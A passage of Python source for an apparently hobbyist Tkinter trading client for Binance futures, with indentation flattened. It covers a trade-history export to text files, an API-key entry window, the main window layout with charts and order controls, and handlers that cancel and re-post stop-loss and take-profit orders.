time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
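#______________Sketch: the trade-export window math in clicked_Ordrs()
#The export loop walks bot.userTrades() in fixed windows: 604800 s is 7 days, and
#Binance timestamps are milliseconds, hence TTT += 604800000 per pass. The same
#stepping as a generator (a sketch; time.time() stands in for the
#time.mktime(time.localtime()) idiom used above):
def week_start_times(lookback_s=604800, window_ms=604800000):
    start_ms = int((int(time.time()) - lookback_s) * 1000)
    now_ms = int(time.time()) * 1000
    while start_ms < now_ms:
        yield start_ms                  #pass as startTime=... to userTrades
        start_ms += window_ms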
#______________MENU END
#______________ACCOUNT API KEYS WINDOW GUI BEGIN
class AccWn:
def __init__(self, window):
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Save",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Close",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________ACCOUNT API KEYS WINDOW GUI END
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
global OrdSz
global PSDvar
        #__Empty label - just the background
self.label_7 = Label(root, text="This is the background!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
#__third label - Graph must be here
self.label_Grpf = Label(root, text="Here's the graph!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
#__fourth label - Market orders must be here
self.label_Ord = Label(root, text="", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
#__first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
#__second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#__Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
#__Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
        #__BTC/USDT watcher start/stop button - start/stop timer
self.button_2 = Button(root, text="Start", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
#__Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES positions:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
#__Account balances start/stop button - start/stop timer
self.button_AB = Button(root, text="Start", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
#__Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
self.Tree_Pos=ttk.Treeview(selectmode='none')
self.Tree_Pos['columns']=('Side','Symbol','Leverage','PnL','Price','markPrice','Liquid', 'Qty')
self.Tree_Pos.column("#0",width=0,stretch=NO)
self.Tree_Pos.column("Side",anchor=W,width=80)
self.Tree_Pos.column("Symbol",anchor=W,width=80)
self.Tree_Pos.column("Leverage",anchor=W,width=80)
self.Tree_Pos.column("PnL",anchor=W,width=80)
self.Tree_Pos.column("Price",anchor=W,width=80)
self.Tree_Pos.column("markPrice",anchor=W,width=80)
self.Tree_Pos.column("Liquid",anchor=W,width=80)
self.Tree_Pos.column("Qty",anchor=W,width=80)
self.Tree_Pos.heading("#0",text="",anchor=CENTER)
self.Tree_Pos.heading("Side",text="Side",anchor=CENTER)
self.Tree_Pos.heading("Symbol",text="Symbol",anchor=CENTER)
self.Tree_Pos.heading("Leverage",text="Leverage",anchor=CENTER)
self.Tree_Pos.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Pos.heading("Price",text="Price",anchor=CENTER)
self.Tree_Pos.heading("markPrice",text="markPrice",anchor=CENTER)
self.Tree_Pos.heading("Liquid",text="Liquid",anchor=CENTER)
self.Tree_Pos.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Pos.place(height=150,width=300,x=210,y=10)
self.Tree_Pos_VScrl = Scrollbar(root,command=self.Tree_Pos.yview)
self.Tree_Pos_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Pos.config(yscrollcommand=self.Tree_Pos_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
        #__fifth label - Buttons for my orders must be here
self.label_Cmd = Label(root, text="", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#__seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Save", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#__PAIR SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['All', 'USDT']
SPSLvar.set(SPSL_list[1])
self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#__PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Pair", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Param",anchor=CENTER)
self.Tree_PI.heading("val",text="Value",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='symbol')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='status')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='baseAsset')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='quoteAsset')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='marginAsset')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='contractType')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='minPrice')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='maxPrice')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='tickSize')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='maxQty')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='stepSize')
#_____________Orders START
        #__Label - backing panel for the order controls
self.label_CmdOrd = Label(self.label_Cmd, text="New position", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
        #__Label - Quantity (Amount)
self.label_QOrd = Label(self.label_CmdOrd, text="Qty", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
        #__TextBox - Quantity (Amount)
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
        #__Label - margin asset and leverage ("USDT x 20")
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
        #__Label - Price
self.label_POrd = Label(self.label_CmdOrd, text="Price", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
        #__TextBox - Price
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
        #__Label - price currency (USDT)
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
#__new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="New Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
#__new order SHORT button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="New Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
#__temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="Show", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
#__close opened orders
self.button_NwODel = Button(self.label_CmdOrd, text="Delete",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
self.Tree_Ord=ttk.Treeview(self.label_CmdOrd,selectmode='browse')
self.Tree_Ord['columns']=('Pos','Side','Price','Qty','Type')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Pos",anchor=W,width=20)
self.Tree_Ord.column("Side",anchor=W,width=20)
self.Tree_Ord.column("Price",anchor=W,width=20)
self.Tree_Ord.column("Qty",anchor=W,width=20)
self.Tree_Ord.column("Type",anchor=W,width=20)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Pos",text="Pos",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Side",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Price",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Ord.heading("Type",text="Type",anchor=CENTER)
self.Tree_Ord.place(height=220,width=180,x=0,y=190)
self.Tree_Ord_VScrl = Scrollbar(self.label_CmdOrd,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=220,width=10,x=180,y=190)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Set",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Set",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=540,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
GRSLvar=StringVar()
GRSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
GRSLvar.set(GRSL_list[2])
self.GRSL = OptionMenu(root,GRSLvar,*GRSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
#__TICK/CANDLE/... start/stop button - start/stop timer
self.button_1 = Button(root, text="Start", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#__Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#__First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#__Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#__TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#__TEST PAINTING END
#__Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#__First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#__First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#__Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#__Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#__BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#__Zoom button
self.button_Ord = Button(root, text="Start Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#__Start/stop button
self.button_OrdTmr = Button(root, text="Orders start", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#__Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
self.Tree_Pos.bind("<Button-1>",self.Tree_Pos_click)
#_______________MIDDLE SIDE END
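#__Append a timestamped line to the system-message box and keep it scrolled
#__to the newest entry.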
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
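#__Recolour the TP/SL scales and their Set/X buttons to match the selected
#__position side (the colours are mirrored between LONG and SHORT).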
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
#__Event left mouse click on the widget Tree_Pos
def Tree_Pos_click(self,event):
#print(should_run_T,should_run_C,should_run_S)
if should_run_T == False and should_run_C == False and should_run_S == False:
Tr_item_0 = app.Tree_Pos.identify('item',event.x,event.y)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
if int(TP_CC) > 0:
#print(len(Tr_item_0))
if len(Tr_item_0) > 0:
if int(Tr_item_0[0]) <= int(TP_CC) and int(Tr_item_0[0]) > 0:
#print(Tr_item_0[0])
#print(app.Tree_Pos.item(Tr_item_0[0])['values'])
Tr_item_1 = app.Tree_Pos.item(Tr_item_0[0])['values']
Tr_item_2 = str(Tr_item_1[1])
#print('.',Tr_item_2,'.')
if MS == 'SPOT':
for ij in range(len(mylist10)):
if mylist10[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
if MS == 'FUTURES':
for ij in range(len(mylist20)):
if mylist20[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
#app.CB_P.set(Tr_item_2) - doesn't work
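#__Re-post the protective order driven by Scale_SL: cancel the matching
#__STOP_MARKET (LONG) / TAKE_PROFIT_MARKET (SHORT) order, then create a new
#__one at PSP_Tmp. The if/elif ladder below only formats the stop price to
#__the pair's tick size; a small helper could replace all four copies of it
#__(illustrative sketch, assumes "import math", not wired in):
#    def fmt_price(price, tick):
#        decimals = max(2, -int(round(math.log10(tick))))
#        return "%.*f" % (decimals, price)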
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Stop-Loss posted [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Take-Profit posted [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
